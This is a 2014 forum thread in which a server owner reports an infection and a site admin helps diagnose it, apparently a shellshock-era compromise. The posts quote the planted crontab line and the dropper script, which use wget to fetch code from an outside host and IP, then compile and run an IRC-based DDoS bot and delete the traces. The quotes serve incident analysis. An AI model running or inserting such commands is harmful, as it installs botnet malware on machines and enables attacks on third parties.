View previous topic :: View next topic |
Author |
Message |
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 8:10 am Post subject: Stablehost vulnerability! |
|
|
Hi all.
I think I was infected.
The service crond is not working - this is how I found out,
and the content of /var/spool/cron/crontabs/root is as follows:
Code: |
crontab 2.3.3
crontab file <opts> replace crontab from file
crontab - <opts> replace crontab from stdin
crontab -u user specify user
crontab -l [user] list crontab for user
crontab -e [user] edit crontab for user
crontab -d [user] delete crontab for user
crontab -c dir specify crontab directory
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >/dev/null 2>&1
|
I found only this link telling something about this.
Do I have to reinstall? |
|
Back to top |
|
gerasimos_h Site Admin
Joined: 09 Aug 2007 Posts: 1757 Location: Greece
|
Posted: Wed Oct 22, 2014 9:54 am Post subject: |
|
|
You are infected alright, although I wouldn't call this a bug though...
First thing is to try to look from where you were infected, so even if you reinstall you wouldn't infected again...
Looking at the script, you can see the source and what it infects, althoug this is a straight forward description at top of the a.c file
Code: | This is a IRC based distributed denial of service client. |
Code: | wget http://205.237.100.170/manual/a.c -O /tmp/init.c;
gcc -o /tmp/init /tmp/init.c;
chmod +x /tmp/init;
/tmp/init;
rm -rf /tmp/init /tmp/init.c;
wget http://205.237.100.170/manual/pb -O /tmp/p;perl /tmp/p;rm -rf /tmp/p;
wget http://205.237.100.170/manual/b -O /tmp/b;chmod +x /tmp/b;/tmp/b;rm -rf /tmp/b; |
So do you have an idea how you could be exposed?
For instance if your root password is the same as an email address or service you use, or your clients you use to connect maybe they have a keylogger?
I'm downloading sources to take a look of them...
gerasimos_h _________________ Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 10:32 am Post subject: |
|
|
Hi,
You're right it is not at all a bug, but I put it here since it is the most recent topic about vulnerabilities.
Well I have actually 2 machines affected. I am the only root user and there are not other users. I can't imagine what was happened, I suspect something regarding the DNS(bind) service because on one machine even it shows bind is working, it can't be accessed from exterior by pinging domain.name.
I can let you inspect the machines... since I am confident in you. |
|
Back to top |
|
gerasimos_h Site Admin
Joined: 09 Aug 2007 Posts: 1757 Location: Greece
|
Posted: Wed Oct 22, 2014 10:39 am Post subject: |
|
|
I would like to take a look, if you don't mind...
Googling it they match those attacks with shellshock, so might be an app you use that has shell access?
You can send me a temporary password via email, to be more secure...
gerasimos_h _________________ Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 10:59 am Post subject: |
|
|
Sent by PM (probabbly twice by mistake...) |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 11:02 am Post subject: |
|
|
Oh... I forgot, I must say that I deleted 2 weird executable files in /tmp, and also delete some files in /var/www/cgi-bin. Those from cgi, I kept them |
|
Back to top |
|
gerasimos_h Site Admin
Joined: 09 Aug 2007 Posts: 1757 Location: Greece
|
Posted: Wed Oct 22, 2014 11:02 am Post subject: |
|
|
Are you sure you sent it to me, because I didn't get any...
gerasimos_h _________________ Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 11:03 am Post subject: |
|
|
Yes, sure, by PM. |
|
Back to top |
|
gerasimos_h Site Admin
Joined: 09 Aug 2007 Posts: 1757 Location: Greece
|
Posted: Wed Oct 22, 2014 11:09 am Post subject: |
|
|
OK! My bad, my inbox was 100% full, so can you please sent it again...
gerasimos_h _________________ Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 11:11 am Post subject: |
|
|
Sent now. |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 11:15 am Post subject: |
|
|
I can confirm the bind service was affected(despite it shows it is running). I switched to another DNS server(the other infected machine) and now the domain can be pinged. |
|
Back to top |
|
gerasimos_h Site Admin
Joined: 09 Aug 2007 Posts: 1757 Location: Greece
|
Posted: Wed Oct 22, 2014 11:21 am Post subject: |
|
|
I sent you a pm, did you got it...
gerasimos_h _________________ Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 11:23 am Post subject: |
|
|
Yes I received and give response 1 min ago. |
|
Back to top |
|
keopp Senior Member
Joined: 08 Nov 2008 Posts: 166 Location: Romania
|
Posted: Wed Oct 22, 2014 11:27 am Post subject: |
|
|
Send me a test message to tudorsps at gmail dot com. I'll use the sender adress to give you details. |
|
Back to top |
|
gerasimos_h Site Admin
Joined: 09 Aug 2007 Posts: 1757 Location: Greece
|
Posted: Wed Oct 22, 2014 11:32 am Post subject: |
|
|
OK...
gerasimos_h _________________ Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
Back to top |
|
|